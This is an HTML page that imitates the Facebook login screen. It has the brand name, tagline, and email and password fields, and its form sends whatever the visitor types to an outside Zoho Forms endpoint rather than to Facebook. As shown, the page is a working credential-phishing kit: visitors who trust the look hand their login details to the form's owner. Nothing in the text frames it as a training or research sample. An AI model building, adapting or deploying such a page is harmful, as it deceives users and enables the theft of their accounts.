<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<style>
.login{
    margin-left:750px;
    width:330px;
    margin-top:-200px;
    border:1px solid lightgrey;
    padding:15px;
    border-radius:5px;
    box-shadow:4px;
    background-color:white;
}
input{
    width:300px;
    margin-top:10px;
    padding:10px;
    border-radius:10px;
    border: 1px solid lightgrey;
    
}
.l1{
    width:325px;
    margin-top:10px;
    padding:10px;
    background-color:#0866ff;
    border:none;
    font-weight:600;
    border-radius:20px;
}
.l2{
    width:155px;
    font-weight:600;
    border-radius:20px;
    border:none;
    padding:10px;
    margin-top:10px;
    background-color:#42b72a;
    margin-left:100px;

    
}
.f1{
    margin-top:50px;
    margin-left:100px;
    text-decoration:none;
    color:#0866ff;
}
.pa1{
    margin-left:780px;


}
body{
background-color:#f0f2f5;
}
.face1{
margin-left:200px;
margin-top:300px;

}
.face2{
margin-top:-50px;
font-size:30px;
}
h1{
color:#0866ff;
font-size:60px;
margin-top:-60px;
font-family:Verdana, Geneva, Tahoma, sans-serif;
}
body{
background-color: #f0f2f5;
}




</style>
<body><div class="face1">
    <h1>facebook</h1>
    <p class="face2">Facebook helps you connect and share<br>with the people in your life.</p>
    
    
    
</div>
    

</html><!-- Change or deletion of the name attributes in the input tag will lead to empty values on record submission-->
<form action='https://forms.zohopublic.in/sanjanabehara01/form/facebook1/formperma/IKZ-U9lrCXSuCVMzYqSZIgY4EE6E_fLlO82uFGIqmpU/htmlRecords/submit' name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
<input type="hidden" name="zf_referrer_name" value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
<input type="hidden" name="zf_redirect_url" value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
<input type="hidden" name="zc_gad" value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->

<p></p>
<!--Single Line-->

<div class="login">
    <form>
        <input type="text"placeholder="Email address or Phone number"name="SingleLine" value="" fieldType=1 maxlength="255"  />
        <br>
        <input type="password"placeholder="Password"name="SingleLine1" value="" fieldType=1 maxlength="255"/>
        <br>
        <button type="submit"class="l1"><em>Login</em></button></form>
        
<br><br>

        <a href=""class="f1">Forgotten password?</a>
        <br><br>
        <hr color="lightgrey"size="1">
                    <button class="l2">Create new account</button>
    </form>
</div>
<div class="pa1">
<p><b>Create a page</b> for a celebrity, brand or business.</p></div>

</body>